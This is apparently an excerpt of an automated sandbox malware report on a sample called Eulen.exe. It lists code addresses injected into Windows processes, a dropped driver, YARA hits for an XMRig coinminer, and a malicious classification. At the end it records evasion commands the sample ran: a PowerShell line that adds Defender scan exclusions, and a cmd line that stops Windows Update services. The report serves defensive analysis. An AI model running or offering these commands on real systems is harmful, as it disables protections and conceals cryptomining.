Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCE2CDC	22_2_00000213BDCE2CDC
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCEBC30	22_2_00000213BDCEBC30
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCEFEF8	22_2_00000213BDCEFEF8
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCEBE3C	22_2_00000213BDCEBE3C
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCF2258	22_2_00000213BDCF2258
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709AF2F8	23_2_00000158709AF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709B1658	23_2_00000158709B1658
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709AB030	23_2_00000158709AB030
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709A20DC	23_2_00000158709A20DC
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709AB23C	23_2_00000158709AB23C
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709DFEF8	23_2_00000158709DFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709E2258	23_2_00000158709E2258
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709DBC30	23_2_00000158709DBC30
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709D2CDC	23_2_00000158709D2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709DBE3C	23_2_00000158709DBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB159B23C	24_2_0000026DB159B23C
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15A1658	24_2_0000026DB15A1658
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15920DC	24_2_0000026DB15920DC
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB159B030	24_2_0000026DB159B030
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB159F2F8	24_2_0000026DB159F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15CBE3C	24_2_0000026DB15CBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15D2258	24_2_0000026DB15D2258
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15C2CDC	24_2_0000026DB15C2CDC
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15CBC30	24_2_0000026DB15CBC30
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15CFEF8	24_2_0000026DB15CFEF8
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15FB23C	24_2_0000026DB15FB23C
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB1601658	24_2_0000026DB1601658
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15F20DC	24_2_0000026DB15F20DC
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15FB030	24_2_0000026DB15FB030
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15FF2F8	24_2_0000026DB15FF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3EFFCB23C	26_2_000002A3EFFCB23C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3EFFC20DC	26_2_000002A3EFFC20DC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3EFFCB030	26_2_000002A3EFFCB030
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3EFFCF2F8	26_2_000002A3EFFCF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3EFFD1658	26_2_000002A3EFFD1658
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F0672258	26_2_000002A3F0672258
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F066FEF8	26_2_000002A3F066FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F066BC30	26_2_000002A3F066BC30
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F0662CDC	26_2_000002A3F0662CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F066BE3C	26_2_000002A3F066BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFB820DC	27_2_000002C9AFB820DC
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFB8B030	27_2_000002C9AFB8B030
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFB8F2F8	27_2_000002C9AFB8F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFB91658	27_2_000002C9AFB91658
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFB8B23C	27_2_000002C9AFB8B23C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBB2CDC	27_2_000002C9AFBB2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBBBC30	27_2_000002C9AFBBBC30
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBBFEF8	27_2_000002C9AFBBFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBC2258	27_2_000002C9AFBC2258
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBBBE3C	27_2_000002C9AFBBBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B02A2258	27_2_000002C9B02A2258
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B029BE3C	27_2_000002C9B029BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B029FEF8	27_2_000002C9B029FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B029BC30	27_2_000002C9B029BC30
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B0292CDC	27_2_000002C9B0292CDC
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06F7BB23C	28_2_000002C06F7BB23C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06F7C1658	28_2_000002C06F7C1658
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06F7B20DC	28_2_000002C06F7B20DC
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06F7BB030	28_2_000002C06F7BB030
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06F7BF2F8	28_2_000002C06F7BF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD52258	28_2_000002C06FD52258
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD4BE3C	28_2_000002C06FD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD42CDC	28_2_000002C06FD42CDC
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD4BC30	28_2_000002C06FD4BC30
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD4FEF8	28_2_000002C06FD4FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3820DC	29_2_000002917C3820DC
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C391658	29_2_000002917C391658
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C38B23C	29_2_000002917C38B23C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C38F2F8	29_2_000002917C38F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C38B030	29_2_000002917C38B030
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3B2CDC	29_2_000002917C3B2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3C2258	29_2_000002917C3C2258
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3BBE3C	29_2_000002917C3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3BFEF8	29_2_000002917C3BFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3BBC30	29_2_000002917C3BBC30
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C972CDC	29_2_000002917C972CDC
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C97BE3C	29_2_000002917C97BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C982258	29_2_000002917C982258
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C97FEF8	29_2_000002917C97FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C97BC30	29_2_000002917C97BC30
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000002238279BC30	30_2_000002238279BC30
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000022382792CDC	30_2_0000022382792CDC
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000002238279BE3C	30_2_000002238279BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_00000223827A2258	30_2_00000223827A2258
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000002238279FEF8	30_2_000002238279FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B882CDC	31_2_0000028A1B882CDC
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B88BC30	31_2_0000028A1B88BC30
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B88FEF8	31_2_0000028A1B88FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B892258	31_2_0000028A1B892258
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B88BE3C	31_2_0000028A1B88BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD7FEF8	32_2_000001486AD7FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD82258	32_2_000001486AD82258
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD7BC30	32_2_000001486AD7BC30
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD72CDC	32_2_000001486AD72CDC
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD7BE3C	32_2_000001486AD7BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADDFEF8	32_2_000001486ADDFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADE2258	32_2_000001486ADE2258
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADDBC30	32_2_000001486ADDBC30
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADD2CDC	32_2_000001486ADD2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADDBE3C	32_2_000001486ADDBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CA20DC	33_2_0000024BD3CA20DC
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CAB030	33_2_0000024BD3CAB030
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CAF2F8	33_2_0000024BD3CAF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CAB23C	33_2_0000024BD3CAB23C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CB1658	33_2_0000024BD3CB1658
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CD2CDC	33_2_0000024BD3CD2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CDBC30	33_2_0000024BD3CDBC30
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CDFEF8	33_2_0000024BD3CDFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CDBE3C	33_2_0000024BD3CDBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CE2258	33_2_0000024BD3CE2258
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D32CDC	33_2_0000024BD3D32CDC
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D3BC30	33_2_0000024BD3D3BC30
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D3FEF8	33_2_0000024BD3D3FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D3BE3C	33_2_0000024BD3D3BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D42258	33_2_0000024BD3D42258
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D41658	34_2_000001FA73D41658
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D3B23C	34_2_000001FA73D3B23C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D320DC	34_2_000001FA73D320DC
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D3B030	34_2_000001FA73D3B030
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D3F2F8	34_2_000001FA73D3F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D72258	34_2_000001FA73D72258
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D6BE3C	34_2_000001FA73D6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D62CDC	34_2_000001FA73D62CDC
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D6BC30	34_2_000001FA73D6BC30
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D6FEF8	34_2_000001FA73D6FEF8
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3EE20DC	39_2_00000249E3EE20DC
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3EEB030	39_2_00000249E3EEB030
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3EEF2F8	39_2_00000249E3EEF2F8
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3EF1658	39_2_00000249E3EF1658
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3EEB23C	39_2_00000249E3EEB23C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3F520DC	39_2_00000249E3F520DC
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3F5B030	39_2_00000249E3F5B030
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3F5F2F8	39_2_00000249E3F5F2F8
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3F61658	39_2_00000249E3F61658
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E3F5B23C	39_2_00000249E3F5B23C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E4302258	39_2_00000249E4302258
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E42FBE3C	39_2_00000249E42FBE3C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E42FFEF8	39_2_00000249E42FFEF8
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E42FBC30	39_2_00000249E42FBC30
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E42F2CDC	39_2_00000249E42F2CDC
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E4332258	39_2_00000249E4332258
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E432BE3C	39_2_00000249E432BE3C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E432FEF8	39_2_00000249E432FEF8
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E432BC30	39_2_00000249E432BC30
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E4322CDC	39_2_00000249E4322CDC
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E49DF2F8	39_2_00000249E49DF2F8
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E49DB23C	39_2_00000249E49DB23C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E49E1658	39_2_00000249E49E1658
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E49D20DC	39_2_00000249E49D20DC
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E49DB030	39_2_00000249E49DB030
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD021BB23C	41_2_000001CD021BB23C
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD021C1658	41_2_000001CD021C1658
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD021BF2F8	41_2_000001CD021BF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD021BB030	41_2_000001CD021BB030
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD021B20DC	41_2_000001CD021B20DC
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD0240BE3C	41_2_000001CD0240BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD02412258	41_2_000001CD02412258
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD0240FEF8	41_2_000001CD0240FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD0240BC30	41_2_000001CD0240BC30
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD02402CDC	41_2_000001CD02402CDC
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269B9FDF2F8	42_2_00000269B9FDF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269B9FE1658	42_2_00000269B9FE1658
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269B9FDB23C	42_2_00000269B9FDB23C
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269B9FD20DC	42_2_00000269B9FD20DC
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269B9FDB030	42_2_00000269B9FDB030
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA66BC30	42_2_00000269BA66BC30
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA662CDC	42_2_00000269BA662CDC
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA66BE3C	42_2_00000269BA66BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA672258	42_2_00000269BA672258
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA66FEF8	42_2_00000269BA66FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6CBC30	42_2_00000269BA6CBC30
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6C2CDC	42_2_00000269BA6C2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6CBE3C	42_2_00000269BA6CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6D2258	42_2_00000269BA6D2258
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6CFEF8	42_2_00000269BA6CFEF8

Source: Joe Sandbox View

Dropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: auqpbnqlvfdv.tmp.0.dr

Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: ChromeUpdater.exe.0.dr	Static PE information: Number of sections : 15 > 10
Source: Eulen.exe	Static PE information: Number of sections : 15 > 10

Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: Eulen.exe, 00000000.00000002.1654102663.00007FF6E047D000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: Q\|.slN3xf{U'pbf
Source: Eulen.exe, 00000000.00000002.1654102663.00007FF6E047D000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: Aw b\|.slN3xf{U'pbg

Source: classification engine

Classification label: mal100.spyw.evad.mine.winEXE@50/71@0/0

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF647342328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

14_2_00007FF647342328

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF647341AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

14_2_00007FF647341AC4

Source: C:\Windows\System32\dialer.exe

14_2_00007FF647342328

Source: C:\Users\user\Desktop\Eulen.exe

File created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03

Source: C:\Users\user\Desktop\Eulen.exe

File created: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Eulen.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Eulen.exe

ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\Eulen.exe

File read: C:\Users\user\Desktop\Eulen.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Eulen.exe "C:\Users\user\Desktop\Eulen.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
